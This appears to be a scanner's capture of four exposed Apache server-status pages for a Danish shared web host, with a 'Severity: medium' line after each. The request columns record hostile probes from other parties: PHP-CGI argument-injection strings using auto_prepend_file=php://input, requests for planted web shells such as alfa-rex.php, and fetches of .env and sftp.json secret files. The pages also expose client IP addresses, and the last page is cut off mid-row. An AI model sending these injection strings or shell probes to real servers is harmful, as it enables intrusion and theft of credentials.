Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 14-Oct-2024 20:14:59 CEST Restart Time: Monday, 14-Oct-2024 16:05:03 CEST Parent Server Generation: 4 Server uptime: 4 hours 9 minutes 55 seconds Total accesses: 20309 - Total Traffic: 9.0 MB CPU Usage: u1.1 s.75 cu0 cs0 - .0123% CPU load 1.35 requests/sec - 626 B/second - 462 B/request 1 requests currently being processed, 29 idle workers ___________________._......_____..__W__......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-4208420/1/607_ 0.006610.00.000.21 213.194.122.82webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-4204530/2/606_ 0.001100.00.000.22 4.1.119.42webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 2-4207200/1/604_ 0.006970.00.010.27 52.167.144.232www.lillekrabbe.dk/lab/doll_s/adopted/chosen%20fantasy_collectionred.gif HTTP/1.0 3-4204540/2/607_ 0.00710.00.000.71 95.108.213.85webhotel5.webhosting.dkGET /film/detaljer/Nasty-Neighbors-3811 HTTP/1.0 4-4204700/2/606_ 0.00000.00.000.20 165.227.173.41webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 5-4208590/1/605_ 0.005910.00.000.33 114.119.166.63webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 6-4208600/1/605_ 0.006620.00.000.20 66.249.66.83www.abstrax.dkGET / HTTP/1.0 7-4208890/1/606_ 0.002010.00.000.26 142.59.17.10webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 8-4210750/1/606_ 0.00310.00.000.26 192.0.116.211webhotel5.webhosting.dkPOST /xmlrpc.php?for=jetpack HTTP/1.0 9-4211940/1/606_ 0.003110.00.000.24 192.0.116.211webhotel5.webhosting.dkGET /?rest_route=/ HTTP/1.0 10-4212470/1/606_ 0.00110.00.000.25 140.99.127.242webhotel5.webhosting.dkGET /dim HTTP/1.0 11-4214200/1/607_ 0.00090.00.000.26 165.227.173.41webhotel5.webhosting.dkGET / HTTP/1.0 12-4204350/2/606_ 0.002400.00.000.20 97.70.137.251webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 13-4216550/1/605_ 0.00010.00.000.35 165.227.173.41webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-4221880/0/602_ 0.103580.00.000.20 66.249.66.83www.abstrax.dkGET /robots.txt HTTP/1.0 15-4216630/1/603_ 0.00010.00.000.23 165.227.173.41webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 16-4204710/2/604_ 0.01080.00.000.24 140.99.127.242webhotel5.webhosting.dkGET / HTTP/1.0 17-4204720/2/604_ 0.00010.00.000.24 165.227.173.41webhotel5.webhosting.dkGET /server HTTP/1.0 18-4223680/0/601_ 0.111320.00.000.21 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 19-4-0/0/601. 0.104100.00.000.28 169.255.161.70webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 20-4216640/1/560_ 0.00010.00.000.23 165.227.173.41webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 21-4-0/0/552. 0.1113600.00.000.27 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-4-0/0/552. 0.0912200.00.000.28 81.19.232.105www.brandstation.infoGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 23-4-0/0/552. 0.1011900.00.000.33 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-4-0/0/551. 0.0912710.00.000.22 31.13.224.121webhotel5.webhosting.dkGET /.env HTTP/1.0 25-4-0/0/551. 0.111101410.00.000.28 159.148.128.196webhotel5.webhosting.dkGET / HTTP/1.0 26-4-0/0/553. 0.111300.00.000.17 47.128.40.63webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 27-4193730/20/520_ 0.06160.00.010.20 165.227.173.41webhotel5.webhosting.dkGET / HTTP/1.0 28-4204220/2/454_ 0.005800.00.000.15 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-4204360/2/454_ 0.003200.00.000.14 185.211.58.110webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 30-4204550/2/418_ 0.00470.00.000.14 192.0.116.211webhotel5.webhosting.dkGET / HTTP/1.0 31-4204560/2/464_ 0.00400.00.000.23 192.0.116.211webhotel5.webhosting.dkcm3udBaUGk%3D&signature=d8WWH5zFWQ1tcKDCgz8DQ6j8HSs%3D HTTP/1.0 32-4-0/0/313. 0.0976120.00.000.11 85.25.210.23webhotel5.webhosting.dkGET / HTTP/1.0 33-4-0/0/284. 0.1115200.00.000.10 185.153.151.152webhotel5.webhosting.dkGET /themes/twentytwentythree/patterns/web.php HTTP/1.0 34-4204730/2/169_ 0.00010.00.000.09 165.227.173.41webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 35-4204740/2/118_ 0.00010.00.000.04 165.227.173.41webhotel5.webhosting.dkGET /about HTTP/1.0 36-4204750/1/117W 0.00000.00.180.22 165.227.173.41webhotel5.webhosting.dkGET /server-status HTTP/1.0 37-4204760/1/117_ 0.008250850.00.000.04 157.55.39.225www.lillekrabbe.dkGET /robots.txt HTTP/1.0 38-4204770/1/116_ 0.007710.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-3-0/0/115. 0.0389100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-3-0/0/116. 0.0489100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-3-0/0/116. 0.0289100.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-2-0/0/100. 0.11527010.00.000.04 165.22.62.38webhotel5.webhosting.dkGET /1.php HTTP/1.0 43-2-0/0/100. 0.1352671160.00.000.03 216.244.66.230webhotel5.webhosting.dkd&c=comment_captcha&t=263bf90eef02e2721d11c513cadad76d HTTP/1.0 44-2-0/0/100. 0.10526900.00.000.03 216.244.66.230webhotel5.webhosting.dker/udvikling-af-kastrupvejbackersvej/?replytocom=15664 HTTP/1.0 45-2-0/0/100. 0.115268960.00.000.03 216.244.66.230webhotel5.webhosting.dkd&c=comment_captcha&t=04848617ed7717be5f84eef706cd9039 HTTP/1.0 46-2-0/0/50. 0.1252651180.00.000.01 216.244.66.230webhotel5.webhosting.dkd&c=comment_captcha&t=29e5b367f8e9184e50bac84873025f53 HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3729d7158
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 12-Oct-2024 21:04:14 CEST Restart Time: Saturday, 12-Oct-2024 16:05:04 CEST Parent Server Generation: 5 Server uptime: 4 hours 59 minutes 10 seconds Total accesses: 19426 - Total Traffic: 53.1 MB CPU Usage: u.59 s.15 cu0 cs0 - .00412% CPU load 1.08 requests/sec - 3101 B/second - 2865 B/request 1 requests currently being processed, 37 idle workers ________________________W_____________.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5509210/8/585_ 0.02010.00.003.30 139.162.101.202webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 1-5509270/5/581_ 0.0137120.00.000.62 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 2-5509220/7/580_ 0.034320.00.000.75 139.162.101.202webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 3-5509230/6/577_ 0.030700.00.000.73 43.157.22.57www.discteknik.dkGET / HTTP/1.0 4-5509240/6/577_ 0.02430.00.001.41 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 5-5509250/5/574_ 0.015400.00.001.14 207.154.222.216webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 6-5509260/5/574_ 0.025010.00.010.82 207.154.222.216webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 7-5509280/5/574_ 0.023110.00.001.05 39.173.107.120webhotel5.webhosting.dkGET /kontakt.html HTTP/1.0 8-5509310/5/546_ 0.013000.00.003.17 165.22.215.87webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 9-5509500/5/545_ 0.01500.00.000.44 139.162.101.202webhotel5.webhosting.dkGET /server HTTP/1.0 10-5509640/5/547_ 0.02200.00.002.39 139.162.101.202webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 11-5509290/5/544_ 0.0231100.00.002.84 165.22.215.87webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 12-5509300/5/543_ 0.033070.00.000.51 37.60.229.171webhotel5.webhosting.dkGET / HTTP/1.0 13-5509320/5/575_ 0.022900.00.002.71 165.22.215.87webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 14-5509330/5/574_ 0.032900.00.001.75 142.59.17.10webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 15-5509340/5/572_ 0.0228170.00.001.01 43.131.44.218webhotel5.webhosting.dkGET / HTTP/1.0 16-5509350/5/571_ 0.022700.00.000.50 165.22.215.87webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 17-5509360/5/569_ 0.012800.00.000.36 165.22.215.87webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 18-5509370/5/568_ 0.012610.00.000.40 165.22.215.87webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 19-5509380/5/568_ 0.032300.00.000.81 47.128.29.182webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 20-5509390/5/565_ 0.03750.00.000.51 139.162.101.202webhotel5.webhosting.dkGET / HTTP/1.0 21-5509400/5/567_ 0.02600.00.002.31 139.162.101.202webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 22-5509800/5/540_ 0.00310.00.001.55 139.162.101.202webhotel5.webhosting.dkGET /about HTTP/1.0 23-5510000/5/568_ 0.02100.00.000.72 139.162.101.202webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 24-5510190/4/554W 0.03000.00.003.98 139.162.101.202webhotel5.webhosting.dkGET /server-status HTTP/1.0 25-5510320/4/538_ 0.005500.00.001.56 47.128.52.49webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 26-5510490/4/539_ 0.015410.00.003.54 52.167.144.175webhotel5.webhosting.dkentiale-genopslag-lja-80072000.aspx?jobId=LJA-80072000 HTTP/1.0 27-5510620/4/552_ 0.025210.00.003.23 207.154.222.216webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 28-5510740/4/519_ 0.015200.00.014.34 207.154.222.216webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 29-5511100/4/567_ 0.025100.00.001.16 185.172.52.195webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 30-5520010/3/486_ 0.023690.00.000.26 87.236.176.198webhotel5.webhosting.dkGET / HTTP/1.0 31-5528090/2/524_ 0.0022110.00.000.22 66.249.72.69www.frederiksbergchokolade.dkGET /robots.txt HTTP/1.0 32-5528100/2/403_ 0.002260.00.000.74 66.249.72.70www.frederiksbergchokolade.dkGET / HTTP/1.0 33-5528110/2/326_ 0.0117620.00.001.75 54.36.148.124www.lillekrabbe.dkGET /lab/tuts/basicdoll5.htm HTTP/1.0 34-5528170/2/294_ 0.002090.00.000.14 27.158.48.98webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 35-5528180/2/237_ 0.0016230.00.010.18 54.36.148.16www.lillekrabbe.dkGET /lab/tuts/basicdoll/047darken.gif HTTP/1.0 36-5528190/2/125_ 0.0216250.00.000.07 139.162.101.202webhotel5.webhosting.dkGET / HTTP/1.0 37-5528200/2/126_ 0.011560.00.000.08 43.130.34.74webhotel5.webhosting.dkGET / HTTP/1.0 38-1-0/0/26. 0.061104700.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-1-0/0/26. 0.071104700.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3d145e8bc
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 10-Oct-2024 19:52:41 CEST Restart Time: Thursday, 10-Oct-2024 16:05:04 CEST Parent Server Generation: 3 Server uptime: 3 hours 47 minutes 37 seconds Total accesses: 20252 - Total Traffic: 32.4 MB CPU Usage: u.94 s.63 cu0 cs0 - .0115% CPU load 1.48 requests/sec - 2485 B/second - 1675 B/request 1 requests currently being processed, 32 idle workers ___________________________W_____............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3327160/18/649_ 0.06370.00.030.59 159.203.96.42webhotel5.webhosting.dkGET / HTTP/1.0 1-3331550/16/632_ 0.03700.00.051.37 13.79.226.168webhotel5.webhosting.dkGET /wp-content/plugins/google-seo-rank/module.php HTTP/1.0 2-3331900/16/626_ 0.03700.00.161.34 13.79.226.168webhotel5.webhosting.dkGET /wp-content/mah.php HTTP/1.0 3-3331910/16/627_ 0.0371090.00.051.55 66.249.66.67webhotel5.webhosting.dkGET / HTTP/1.0 4-3334580/16/626_ 0.02210.00.021.37 159.203.96.42webhotel5.webhosting.dkGET /server HTTP/1.0 5-3338720/13/619_ 0.03700.00.040.38 13.79.226.168webhotel5.webhosting.dkGET /gnxdfcoj.php HTTP/1.0 6-3335330/15/616_ 0.03700.00.031.27 13.79.226.168webhotel5.webhosting.dkGET /wp-content/ovabnkloq.php HTTP/1.0 7-3335070/15/615_ 0.02700.00.060.58 13.79.226.168webhotel5.webhosting.dkGET /wp-admin/css/colors/ocean/atomlib.php HTTP/1.0 8-3334920/15/615_ 0.03700.00.040.56 13.79.226.168webhotel5.webhosting.dkGET /wp-content/themes/dym6wcyw/fooster1337.php HTTP/1.0 9-3337710/14/614_ 0.02620.00.081.46 130.226.228.73www.tutak.dka2/thumbs/193%20Klokkespil,%20Vor%20Frelsers%20....jpg HTTP/1.0 10-3338730/14/615_ 0.026100.00.101.03 159.203.96.42webhotel5.webhosting.dkGET / HTTP/1.0 11-3337930/15/615_ 0.0341370.00.030.49 195.82.147.13webhotel5.webhosting.dkGET / HTTP/1.0 12-3312400/29/578_ 0.06030.00.120.44 130.226.228.73www.tutak.dkGET /volga/volga/volga2/thumbs/068%20Kazan.jpg HTTP/1.0 13-3335080/15/612_ 0.05700.00.130.64 13.79.226.168webhotel5.webhosting.dkGET /wp-includes/js/tinymce/themes/feed.php HTTP/1.0 14-3326730/18/562_ 0.05400.00.110.56 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 15-3337940/15/610_ 0.02420.00.030.72 130.226.228.73www.tutak.dkET /volga/volga/volga2/thumbs/194%20Rybinsk-slusen.jpg HTTP/1.0 16-3338600/15/610_ 0.04010.00.131.21 159.203.96.42webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 17-3338900/12/607_ 0.02110.00.051.05 159.203.96.42webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 18-3335340/15/609_ 0.03700.00.040.71 13.79.226.168webhotel5.webhosting.dkGET /wp-includes/images/smilies/ HTTP/1.0 19-3327280/18/562_ 0.02210.00.140.95 159.203.96.42webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 20-3338910/12/606_ 0.02110.00.061.08 130.226.228.73www.tutak.dkET /volga/volga/volga2/thumbs/195%20Rybinsk-slusen.jpg HTTP/1.0 21-3338920/12/606_ 0.02110.00.011.66 159.203.96.42webhotel5.webhosting.dkGET /about HTTP/1.0 22-3335350/15/559_ 0.04700.00.071.00 13.79.226.168webhotel5.webhosting.dkGET /wp-content/blogs.dir/about.php HTTP/1.0 23-3335360/15/543_ 0.02700.00.040.71 13.79.226.168webhotel5.webhosting.dkGET /wp-content/themes/fex.php HTTP/1.0 24-3338930/12/538_ 0.03110.00.111.47 159.203.96.42webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 25-3339080/12/589_ 0.02000.00.091.19 159.203.96.42webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 26-3339090/11/538_ 0.02800.00.020.79 13.79.226.168webhotel5.webhosting.dkGET /z.php HTTP/1.0 27-3339100/11/537W 0.01000.00.051.10 159.203.96.42webhotel5.webhosting.dkGET /server-status HTTP/1.0 28-3339110/11/537_ 0.02800.00.140.95 13.79.226.168webhotel5.webhosting.dkGET /includes/1975Team.php HTTP/1.0 29-3339120/11/538_ 0.02800.00.101.22 13.79.226.168webhotel5.webhosting.dkGET /repeater.php HTTP/1.0 30-3339130/11/493_ 0.03700.00.010.44 13.79.226.168webhotel5.webhosting.dkGET /wp-includes/Text/fosil.php HTTP/1.0 31-3339140/11/461_ 0.02700.00.080.56 13.79.226.168webhotel5.webhosting.dkGET /6GC9QJ.php HTTP/1.0 32-3339150/11/448_ 0.01710.00.090.46 13.79.226.168webhotel5.webhosting.dkGET /wp-content/plugins/alfa-rex.php8 HTTP/1.0 33-3-0/0/336. 0.0927700.00.000.32 13.79.229.207webhotel5.webhosting.dkGET /wp-cc.php HTTP/1.0 34-3-0/0/253. 0.1027700.00.000.27 13.79.229.207webhotel5.webhosting.dkGET /wp-content/themes/aw9tlrp8/fooster1337.php HTTP/1.0 35-3-0/0/143. 0.0827710.00.000.66 45.134.79.111webhotel5.webhosting.dkGET /wp-admin/ HTTP/1.0 36-3-0/0/119. 0.0927600.00.000.15 13.79.229.207webhotel5.webhosting.dkGET /wp-content/themes/index.php HTTP/1.0 37-3-0/0/70. 0.10131100.00.000.04 13.39.49.100webhotel5.webhosting.dkGET /test/ HTTP/1.0 38-1-0/0/20. 0.02675100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-1-0/0/19. 0.02675100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-1-0/0/19. 0.04675100.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-1-0/0/20. 0.03675100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-1-0/0/18. 0.04675100.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-1-0/0/19. 0.04675100.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-0-0/0/4. 0.001035300.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3bdd1c392
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 08-Oct-2024 19:21:07 CEST Restart Time: Tuesday, 08-Oct-2024 16:10:05 CEST Parent Server Generation: 3 Server uptime: 3 hours 11 minutes 1 second Total accesses: 27638 - Total Traffic: 16.2 MB CPU Usage: u1.95 s1.33 cu0 cs0 - .0286% CPU load 2.41 requests/sec - 1477 B/second - 612 B/request 1 requests currently being processed, 31 idle workers ___W____________________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3226960/18/822_ 0.050110.00.010.29 196.198.13.151webhotel5.webhosting.dkGET / HTTP/1.0 1-3226980/18/814_ 0.02000.00.000.29 159.223.132.86webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 2-3226990/17/813_ 0.033200.00.001.63 93.235.159.64webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 3-3227020/16/810W 0.03000.00.000.36 159.223.132.86webhotel5.webhosting.dkGET /server-status HTTP/1.0 4-3227030/16/808_ 0.0342930.00.001.17 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 5-3227040/16/806_ 0.024110.00.001.82 87.120.113.178webhotel5.webhosting.dkGET /about/function.php HTTP/1.0 6-3227050/16/806_ 0.033700.00.000.34 193.77.36.20webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-3227230/15/805_ 0.033180.00.000.51 104.37.26.25webhotel5.webhosting.dkGET / HTTP/1.0 8-3227240/15/804_ 0.023000.00.000.35 93.235.159.64webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-3227250/15/802_ 0.023000.00.000.56 46.11.205.132webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 10-3227260/15/803_ 0.01210.00.000.35 159.223.132.86webhotel5.webhosting.dkGET /server HTTP/1.0 11-3227270/15/800_ 0.03110.00.000.26 159.223.132.86webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-3227280/15/802_ 0.03100.00.000.27 159.223.132.86webhotel5.webhosting.dkGET /about HTTP/1.0 13-3227290/15/800_ 0.02110.00.000.29 159.223.132.86webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-3227300/15/801_ 0.02010.00.000.43 159.223.132.86webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 15-3227310/14/798_ 0.022820.00.000.30 87.120.113.178webhotel5.webhosting.dkGET /about.php HTTP/1.0 16-3227320/14/798_ 0.032490.00.000.33 57.128.81.210webhotel5.webhosting.dkGET / HTTP/1.0 17-3227330/14/798_ 0.022400.00.000.27 57.128.81.210webhotel5.webhosting.dkGET /ads.txt HTTP/1.0 18-3227340/14/798_ 0.022230.00.000.25 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 19-3227350/14/749_ 0.021910.00.000.38 87.120.113.178webhotel5.webhosting.dkGET /dropdown.php HTTP/1.0 20-3227360/14/748_ 0.021210.00.000.35 52.167.144.185webhotel5.webhosting.dkGET /sitemap.xml HTTP/1.0 21-3227370/14/748_ 0.0211130.00.000.27 81.19.232.105www.tutak.dkGET /julegavetur.htm HTTP/1.0 22-3227380/14/699_ 0.021000.00.000.33 68.79.79.181webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 23-3227390/14/697_ 0.01900.00.000.24 66.249.66.67webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 24-3227400/14/698_ 0.02930.00.000.22 66.249.66.67webhotel5.webhosting.dkGET /products/albert-overall-pistachio-6-12m HTTP/1.0 25-3227410/14/698_ 0.02670.00.000.24 159.223.132.86webhotel5.webhosting.dkGET / HTTP/1.0 26-3227420/14/748_ 0.02460.00.000.30 40.77.167.26webhotel5.webhosting.dk85-green-cotton-linen/4923-green-cotton-linen--fv-639/ HTTP/1.0 27-3227430/14/698_ 0.03400.00.000.26 52.167.144.191webhotel5.webhosting.dkter-boern/1402-opskrift---------------------nr-111029/ HTTP/1.0 28-3227440/14/698_ 0.02300.00.000.32 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 29-3227450/14/579_ 0.03360.00.000.28 159.223.132.86webhotel5.webhosting.dkGET / HTTP/1.0 30-3212990/39/508_ 0.06000.00.020.17 196.198.13.151webhotel5.webhosting.dkGET /bofit HTTP/1.0 31-3227460/14/450_ 0.02210.00.001.52 159.223.132.86webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 32-3-0/0/436. 0.0898000.00.000.14 85.203.211.149webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 33-3-0/0/350. 0.0997700.00.000.10 216.244.66.231webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 34-3-0/0/300. 0.0997500.00.000.09 15.237.128.43webhotel5.webhosting.dkGET /new/ HTTP/1.0 35-3-0/0/299. 0.0997210.00.000.10 15.237.128.43webhotel5.webhosting.dkGET /test/ HTTP/1.0 36-3-0/0/250. 0.1197270.00.000.08 15.237.128.43webhotel5.webhosting.dkGET / HTTP/1.0 37-3-0/0/200. 0.0997200.00.000.07 15.237.128.43webhotel5.webhosting.dkGET /backup/ HTTP/1.0 38-3-0/0/200. 0.1097200.00.000.06 15.237.128.43webhotel5.webhosting.dkGET /temp/ HTTP/1.0 39-3-0/0/149. 0.0996910.00.000.04 40.77.167.85webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 40-3-0/0/150. 0.0996800.00.000.04 40.77.167.85webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 41-3-0/0/150. 0.0996100.00.000.08 35.94.99.54webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 42-2-0/0/100. 0.08362510.00.000.03 52.164.225.109webhotel5.webhosting.dkGET /wp-admin/maint/GVNjXnV.php HTTP/1.0 43-2-0/0/98. 0.08362500.00.000.03 52.164.225.109webhotel5.webhosting.dkGET /wp-admin/css/colors/ocean/about.php HTTP/1.0 44-2-0/0/100. 0.06362500.00.000.07 52.164.225.109webhotel5.webhosting.dkGET /wordpress/alfa-rex.php7 HTTP/1.0 45-0-0/0/50. 0.07967900.00.000.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 46-0-0/0/50. 0.089676130.00.000.02 80.208.64.39www.valloe.orgGET /liv/familydk/index15.htm HTTP/1.0 47-0-0/0/50. 0.07967600.00.000.01 185.211.58.226webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 48-0-0/0/50. 0.09967600.00.000.01 188.177.107.157webhotel5.webhosting.dkl.asp?t=person&p=2bef1d377515dc22f1faff255ff5c8da&i=JE HTTP/1.0 49-0-0/0/50. 0.08967400.00.000.06 